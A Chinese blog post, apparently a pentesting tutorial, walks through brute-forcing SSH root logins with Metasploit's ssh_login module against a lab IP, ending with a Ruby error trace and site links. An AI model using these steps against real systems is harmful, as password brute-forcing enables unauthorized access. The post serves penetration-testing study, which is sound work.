zoukankan      html  css  js  c++  java
  • msf ssh port:22

    auxiliary/scanner/ssh/ssh_login 这个模块扫描很慢,建议使用其它多线程工具扫描。

    1. 在终端中输入命令“nmap 192.168.1.3”,对目标主机进行端口扫描,发现主机开放22端口;

    2. 在终端中输入命令“msfconsole”,启动MSF终端

    3. 在终端中输入命令“search ssh_login”,搜索ssh_login的相关工具和攻击载荷;

    4. 在终端中输入命令“use auxiliary/scanner/ssh/ssh_login”,启用漏洞利用模块, 提示符就会提示进入到该路径下;

    5. 在终端中输入命令“show options”,查看需要设置的相关项,“yes”表示必须填写的参数;

    6. 在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址;

    7. 在终端中输入“set USERNAME root”,指定登陆用户名root;

    8. 在终端中输入“set PASS_FILE /home/passwd.txt”,设置暴利破解的密码文件路径;

    9. 在终端中输入“set THREADS 50”,设置暴利破解的线程数为50;

    10. 在终端中输入“run”,开始向目标主机爆破ssh的登陆帐号和密码,如果爆破成功,就会显示登陆帐号为root,密码为Xxx;

    11. 在终端中输入“ssh root@192.168.1.3”,连接目标主机;

    注意:
    在扫描中,如果使用ctr + c 中断之后,重新run ,就会报错,我想到的解决方式就是重新打开msf。

    [-] Auxiliary failed: JSON::ParserError 783: unexpected token at '<h1>Internal Server Error</h1>'
    [-] Call stack:
    [-]   /opt/metasploit-framework/embedded/lib/ruby/gems/2.6.0/gems/json-2.3.0/lib/json/common.rb:156:in `parse'
    ...
    

    参考

    https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/

  • 相关阅读:
    2019-8-31-win10-uwp-使用-WinDbg-调试
    PHP simplexml_import_dom() 函数
    PHP asXML() 函数
    PHP registerXPathNamespace() 函数
    PHP getNamespaces() 函数
    PHP getName() 函数
    查看收集统计信息的时间间隔
    SPOJ DISQUERY LCA + 倍增
    洛谷P3958 奶酪 并查集
    洛谷P2678 跳石头
  • 原文地址:https://www.cnblogs.com/mysticbinary/p/12762841.html
Copyright © 2011-2022 走看看